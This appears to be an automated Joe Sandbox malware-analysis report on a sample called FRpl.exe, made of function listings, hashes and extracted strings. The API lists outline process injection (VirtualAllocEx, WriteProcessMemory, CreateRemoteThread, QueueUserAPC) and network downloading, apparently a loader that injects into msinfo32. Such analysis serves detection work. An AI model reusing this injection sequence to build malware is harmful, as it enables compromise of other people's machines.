Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22f81112643ec07e2a86c45cd9c0a4cb04c91263063b09da35d091e7ddf32000
Instruction ID: 97cd3ec90308be692b50a99ebf37ae1b93f2c7a745fa7c428b65309a9e059605
Opcode Fuzzy Hash: 22f81112643ec07e2a86c45cd9c0a4cb04c91263063b09da35d091e7ddf32000
Instruction Fuzzy Hash: 29D0C900F9980E16FA8876ED7866BFCA182CFC8315FA546B1E41CC22DFCC4C6D825253

Function 00007FFD9B892427 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4afdf4dffd4dbc01bf7bd46195aff09f629d4a374197c65046e8e9c5bc2e9dfa
Instruction ID: 8fa017f35baae9fe87e0bb5cc5bdc71421a8c14c1f4231f980d2eda21baafb92
Opcode Fuzzy Hash: 4afdf4dffd4dbc01bf7bd46195aff09f629d4a374197c65046e8e9c5bc2e9dfa
Instruction Fuzzy Hash: 08D05E10B1DA862FE745B3F85427A9DA9E19FD4300F1541B9A405831E7CC5C98419212

Function 00007FFD9B892456 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44316bd6cb8698757b11ada2b63c4fdd4ee0dbe42d85899accdbea9fe024f1a4
Instruction ID: 4bad5d6071811878fc8a3b5c51ef659e473a11ee7bbfb9c78f229f5ba57a05c6
Opcode Fuzzy Hash: 44316bd6cb8698757b11ada2b63c4fdd4ee0dbe42d85899accdbea9fe024f1a4
Instruction Fuzzy Hash: 0BD0A715B1DA897BE745B3F85827BAE69E19FC4310F1541B9E805C31D7CC4C9841D713

Function 00007FFD9B892385 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d8787514857c3626f54a2d5fe5a0ab2c2ef4f69ee19aebfbce13961f6ccfe57
Instruction ID: ae75f9a9dd3fffb93c49b74d5892911d4785e6106a2c2d8f2a2f6a287a5e45ae
Opcode Fuzzy Hash: 0d8787514857c3626f54a2d5fe5a0ab2c2ef4f69ee19aebfbce13961f6ccfe57
Instruction Fuzzy Hash: EBD05E00B1DA817BE745B3F85427B5DA9E19FC4200F1541BAA409C31D7CC4C98458212

Function 00007FFD9B8923B4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9469d93f786f59887e058ff8ee38cb8c5f8e0e1a8dd35f07b378f7c03077812b
Instruction ID: b95762a4780a666ffc54ebbb22ab97c984b9a7fb5420ab3e1b2a973eaf8409ca
Opcode Fuzzy Hash: 9469d93f786f59887e058ff8ee38cb8c5f8e0e1a8dd35f07b378f7c03077812b
Instruction Fuzzy Hash: 53D05E01B5DA853BE785B3F85426BAD69E19FD4600F1541B9E409835D7CC4C98419212

Function 00007FFD9B892356 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dcf41abe46292bf716cb29ec9ed593815d45e9970539a5e9be4b72280b9fd1d
Instruction ID: 88bd814cb38d8f876181e9daca7971269ee22a1c53c1b4b7a16cbbc3d35e7942
Opcode Fuzzy Hash: 6dcf41abe46292bf716cb29ec9ed593815d45e9970539a5e9be4b72280b9fd1d
Instruction Fuzzy Hash: 7BD05E01B1DA857BE385B3F85526B5E69E19FC4200F1542B9E409831D7CC4CA8418212

Function 00007FFD9B892485 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cc02e992ab2aeab1cdf2881f4e4a94a5424e5708be0cf5be7a43c652b4c8121
Instruction ID: 577a81585f0b9816d852e2448601eaeec1314cda8eebb307c8d4bbd0ddc49403
Opcode Fuzzy Hash: 2cc02e992ab2aeab1cdf2881f4e4a94a5424e5708be0cf5be7a43c652b4c8121
Instruction Fuzzy Hash: F7D05E11B1DA897BE785B3F85426A9D69E19FC4300F1581B9A409C31E7CC4C98459312

Function 00007FFD9B890ED8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d542d7304e2cc86dddc4c5c7626582e4b7497e04f73076e822ba11c925f164f
Instruction ID: 03776025d4c0220239ceb36137f23afb7e82682277e013a2be16892e30caf52a
Opcode Fuzzy Hash: 8d542d7304e2cc86dddc4c5c7626582e4b7497e04f73076e822ba11c925f164f
Instruction Fuzzy Hash: 35B01200D6780F00DC2433F5085216878009F5C700FC60070D408C00D1984D1B9511E2

Analysis Process: FRpl.exePID: 6544, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	762
Total number of Limit Nodes:	6

Executed Functions

Function 00B64AA1 Relevance: 78.4, APIs: 35, Strings: 8, Instructions: 3134injectionnetworklibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B71956: TlsGetValue.KERNEL32 ref: 00B71977
Part of subcall function 00B71956: memset.MSVCRT ref: 00B71A3F
Part of subcall function 00B71956: TlsGetValue.KERNEL32 ref: 00B71AB4
Part of subcall function 00B71956: TlsSetValue.KERNEL32 ref: 00B71AC1

LoadLibraryA.KERNELBASE ref: 00B64F09
LoadLibraryA.KERNELBASE ref: 00B64F3A
CreateProcessA.KERNELBASE ref: 00B6523D

Part of subcall function 00B9F130: WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00B9F28F

VirtualAllocEx.KERNELBASE ref: 00B65430
WriteProcessMemory.KERNELBASE ref: 00B654EE

Part of subcall function 00B648C3: strlen.MSVCRT ref: 00B6490A

CreateRemoteThread.KERNELBASE ref: 00B656B8
VirtualProtectEx.KERNELBASE ref: 00B658F8
WriteProcessMemory.KERNELBASE ref: 00B65929
VirtualProtectEx.KERNELBASE ref: 00B65A2F
VirtualProtectEx.KERNELBASE ref: 00B65C01
WriteProcessMemory.KERNELBASE ref: 00B65C2F
VirtualProtectEx.KERNELBASE ref: 00B65D30
memset.MSVCRT ref: 00B65E42
InternetOpenA.WININET ref: 00B65E9B
InternetOpenUrlA.WININET ref: 00B65EF2
InternetReadFile.WININET ref: 00B65F23

Part of subcall function 00B63444: memcpy.MSVCRT ref: 00B63472

memset.MSVCRT ref: 00B66962
memcpy.MSVCRT ref: 00B66A25
memcpy.MSVCRT ref: 00B66A64
memcpy.MSVCRT ref: 00B66B2A
memcpy.MSVCRT ref: 00B66E2B
memcpy.MSVCRT ref: 00B66E6A
memcpy.MSVCRT ref: 00B66F30
memset.MSVCRT ref: 00B66FC8
VirtualAllocEx.KERNELBASE ref: 00B67142
WriteProcessMemory.KERNELBASE ref: 00B671A6
QueueUserAPC.KERNELBASE ref: 00B671C2
ResumeThread.KERNELBASE ref: 00B671E1
SetLastError.KERNEL32 ref: 00B6733E
GetModuleFileNameW.KERNEL32 ref: 00B6734B
GetLastError.KERNEL32 ref: 00B67356
GetLastError.KERNEL32 ref: 00B6736B
CopyFileExW.KERNEL32 ref: 00B67D37
GetLastError.KERNEL32 ref: 00B68111
GetLastError.KERNEL32 ref: 00B68627

Strings

appdata, xrefs: 00B67443
AES-NI not supported on this architecture. If you are using the MSVC toolchain, this is because the AES-NI method's have not been ported, yet/mnt/c/Users/admin/.cargo/registry/src/index.crates.io-6f17d22bba15001f/rust-crypto-0.2.36/src/aesni.rs, xrefs: 00B68596
Invalid AES key size., xrefs: 00B685F9
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789, xrefs: 00B64B00
HANDLE:\, xrefs: 00B6874A
[86!6f3', xrefs: 00B6551A
@, xrefs: 00B6712F
called `Result::unwrap()` on an `Err` value, xrefs: 00B680B1, 00B68155, 00B683B2, 00B683E7, 00B68571, 00B685BA

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: memcpy$Virtual$ErrorLastProcess$MemoryProtectWritememset$FileInternetValue$AllocCreateLibraryLoadOpenThread$AddressCopyModuleNameQueueReadRemoteResumeSingleUserWakestrlen
String ID: @$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789$AES-NI not supported on this architecture. If you are using the MSVC toolchain, this is because the AES-NI method's have not been ported, yet/mnt/c/Users/admin/.cargo/registry/src/index.crates.io-6f17d22bba15001f/rust-crypto-0.2.36/src/aesni.rs$HANDLE:\$Invalid AES key size.$[86!6f3'$appdata$called `Result::unwrap()` on an `Err` value
API String ID: 386811839-3323831040
Opcode ID: 4126b98aba36b8b9fa54c14cb13db2673f70dea28bf59e77754588329b96678a
Instruction ID: 0f0742c417adfc74bab1d4cee10c0e0d9a2989cd24d3d071d96336606da27931
Opcode Fuzzy Hash: 4126b98aba36b8b9fa54c14cb13db2673f70dea28bf59e77754588329b96678a
Instruction Fuzzy Hash: 54639972318BC181EB20DB25E4547AAB3A4F789B84F848666DECD07B59DF7DC646CB00

Function 00B7B6F0 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 373
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 00B7B72B
CloseHandle.KERNEL32 ref: 00B7BA84

Part of subcall function 00BA28B0: RtlCaptureContext.KERNEL32 ref: 00BA2935
Part of subcall function 00BA28B0: RtlUnwindEx.KERNEL32 ref: 00BA2953
Part of subcall function 00BA28B0: abort.MSVCRT ref: 00BA2959
Part of subcall function 00BA28B0: abort.MSVCRT ref: 00BA2970

MultiByteToWideChar.KERNEL32 ref: 00B7BB34
WriteConsoleW.KERNEL32 ref: 00B7BB73
WriteConsoleW.KERNEL32 ref: 00B7BBDA
GetLastError.KERNEL32 ref: 00B7BBE3
GetLastError.KERNEL32 ref: 00B7BC4E

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00B7BA22

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: ErrorLast$ConsoleWriteabort$ByteCaptureCharCloseContextHandleMultiUnwindWide
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 3690811170-2333694755
Opcode ID: ccbafbfebb141457d75c273a2f1394f1fa269c0b7fbe138dbad1fa2a2cdd045a
Instruction ID: 20211072f9908c079f25bcc5323f2625c62d0478139162dce5d81f7b9354dd4e
Opcode Fuzzy Hash: ccbafbfebb141457d75c273a2f1394f1fa269c0b7fbe138dbad1fa2a2cdd045a
Instruction Fuzzy Hash: 06E11E627046908AEB259F34D840BED37A1F745398F90C262EEAD57B99EF7CC685C700

Function 00B61180 Relevance: 12.2, APIs: 8, Instructions: 205
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00B611E6
SetUnhandledExceptionFilter.KERNEL32 ref: 00B61258
malloc.MSVCRT ref: 00B61322
strlen.MSVCRT ref: 00B61345
malloc.MSVCRT ref: 00B61351
memcpy.MSVCRT ref: 00B61365
GetStartupInfoA.KERNEL32 ref: 00B61463

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
String ID:
API String ID: 649803965-0
Opcode ID: 56d3077b24a10557b69448890dda5a8fca88be95f18b9fc4ab5efc74502c2d62
Instruction ID: ce263e6498007dbb1c0690b0e48d53fc539dfcefa33e66462bd4a495b6026f88
Opcode Fuzzy Hash: 56d3077b24a10557b69448890dda5a8fca88be95f18b9fc4ab5efc74502c2d62
Instruction Fuzzy Hash: 3281CC3270574886EB20AF5EE8A176D33E5F746B80F8888A6DE0987715DF7DC844C710

Function 00B68820 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadDescription.KERNELBASE ref: 00B6886A

Part of subcall function 00B7C630: TlsGetValue.KERNEL32 ref: 00B7C64F
Part of subcall function 00B7C630: TlsGetValue.KERNEL32 ref: 00B7C683
Part of subcall function 00B7C630: TlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,00B7C741), ref: 00B7C693

Part of subcall function 00B7C560: TlsGetValue.KERNEL32 ref: 00B7C582
Part of subcall function 00B7C560: TlsGetValue.KERNEL32 ref: 00B7C5D2
Part of subcall function 00B7C560: TlsSetValue.KERNEL32(?,?,00000000,?,00B7C741), ref: 00B7C5E2

Strings

main, xrefs: 00B68860

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: Value$DescriptionThread
String ID: main
API String ID: 1014837369-3207122276
Opcode ID: c1d8d602db548a8f4d35c744c6b2dddfc4c48d2672d91014ae1290c153ee3b8f
Instruction ID: e7436b89970694e2d8f7d60cf510d98655bb3af1a8cd7c627e537c6ebde54dc3
Opcode Fuzzy Hash: c1d8d602db548a8f4d35c744c6b2dddfc4c48d2672d91014ae1290c153ee3b8f
Instruction Fuzzy Hash: C1514832611B5499EB10EFA0E8913ED33B4FB45308F90856AEA5D67B95EF38C94AC341

Function 00B7BAA0 Relevance: 6.1, APIs: 4, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32 ref: 00B7BB34
WriteConsoleW.KERNEL32 ref: 00B7BB73
WriteConsoleW.KERNEL32 ref: 00B7BBDA
GetLastError.KERNEL32 ref: 00B7BBE3
GetLastError.KERNEL32 ref: 00B7BC4E

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: ConsoleErrorLastWrite$ByteCharMultiWide
String ID:
API String ID: 1956605914-0
Opcode ID: 84192aeb223bf039493d913838b751b5b078c80bf8458050e23cca5f8a524f14
Instruction ID: 2d220b4799008c1000a64f405b0f1a090ba1f4331ad8153406ddac2c6c6b8f47
Opcode Fuzzy Hash: 84192aeb223bf039493d913838b751b5b078c80bf8458050e23cca5f8a524f14
Instruction Fuzzy Hash: B83104726045A44AEB254B35D844BEE66D1F7053E4F04C2B1EEAE8BBD8EF78C5418B00

Function 00B9F130 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00B9F28F

Strings

lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs, xrefs: 00B9F323
stdoutlibrary\std\src\io\mod.rsfailed to write whole buffer, xrefs: 00B9F14A

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: AddressSingleWake
String ID: lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs$stdoutlibrary\std\src\io\mod.rsfailed to write whole buffer
API String ID: 3114109732-4016646221
Opcode ID: 673844cf1efdddbcaa794146a7d21ef0155e645c6ad0a49ece3fa00b3c115906
Instruction ID: c7be5991b9c45a3a7d07a6555b46c7948675e4dd25aa1471be36ed1741c4cc4a
Opcode Fuzzy Hash: 673844cf1efdddbcaa794146a7d21ef0155e645c6ad0a49ece3fa00b3c115906
Instruction Fuzzy Hash: 9C51AD32615B558AEF10EBA0E8803AD33B5F7047A8F948576EE4DA7B54DF78C48AC340

Function 00B71956 Relevance: 5.1, APIs: 4, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32 ref: 00B71977
memset.MSVCRT ref: 00B71A3F
TlsGetValue.KERNEL32 ref: 00B71AB4
TlsSetValue.KERNEL32 ref: 00B71AC1

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: Value$memset
String ID:
API String ID: 3732838118-0
Opcode ID: 754314cf32835ceba5bf4eb6b678b62dcf53cc62122da42959d73bae2541ae03
Instruction ID: 8295455a4bb0fedbb978da80c863cb495dfd555e00ce4a038e422ce50f1e9610
Opcode Fuzzy Hash: 754314cf32835ceba5bf4eb6b678b62dcf53cc62122da42959d73bae2541ae03
Instruction Fuzzy Hash: E6518E32609BC492E7298F28E6413E9A3E0FB99784F149611DFAC17725EF38D6A5C340

Function 00B9EC40 Relevance: 2.7, APIs: 2, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00B9ECF9
memcpy.MSVCRT ref: 00B9EEAC

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 45cb6a88c03ae7bc8c3add63fc1c85d6650b63103496521e23a78d9f36850919
Instruction ID: 8b2123ea8f893e6e0e71da4aa700e99ed3296cd90a861ae63f8757ba3c5812e9
Opcode Fuzzy Hash: 45cb6a88c03ae7bc8c3add63fc1c85d6650b63103496521e23a78d9f36850919
Instruction Fuzzy Hash: 4E611463711A9492DE20DF2299043AD7BE1FB1ABE4F848A75DE6E17B94DB3CD185C300

Function 00B7C2E0 Relevance: 1.4, APIs: 1, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 6f6dc09aa7c662e024324c2309773761124c712cafbe4db4a15ffbb12c23a858
Instruction ID: f65d6cd676d0ba349eda84a48e0006e32de2668fd46f3499417b57a6adb4dc6d
Opcode Fuzzy Hash: 6f6dc09aa7c662e024324c2309773761124c712cafbe4db4a15ffbb12c23a858
Instruction Fuzzy Hash: D4317B6230464482DE25DF26AA5937AABE1FB41BD4F54C86E9E3E0BB54CF3CC445C300

Function 00B7C40D Relevance: 1.3, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00B7C491

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: c3a6c91664c1b522c37d69ebb7d00f1455ea75abf349b2411abfd2870fff3425
Instruction ID: d4b12e7eb40c597b6ed9804984d072a38b0d537f906c46c2ba193b872bb1ead5
Opcode Fuzzy Hash: c3a6c91664c1b522c37d69ebb7d00f1455ea75abf349b2411abfd2870fff3425
Instruction Fuzzy Hash: 3011086330175443CD258B2AAA5933ADAD5EB01BE8F4489698F7E07FD4C77CC5818204

Function 00B63444 Relevance: 1.3, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00B63472

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: f6585f0aeca96471679dd929d5b489702fc140ae0c9539dee33da2eeea6da2ac
Instruction ID: f7535b28e15813015ab232b8cb86fd0173dcc7cfb803659ae19feea748e0cfc0
Opcode Fuzzy Hash: f6585f0aeca96471679dd929d5b489702fc140ae0c9539dee33da2eeea6da2ac
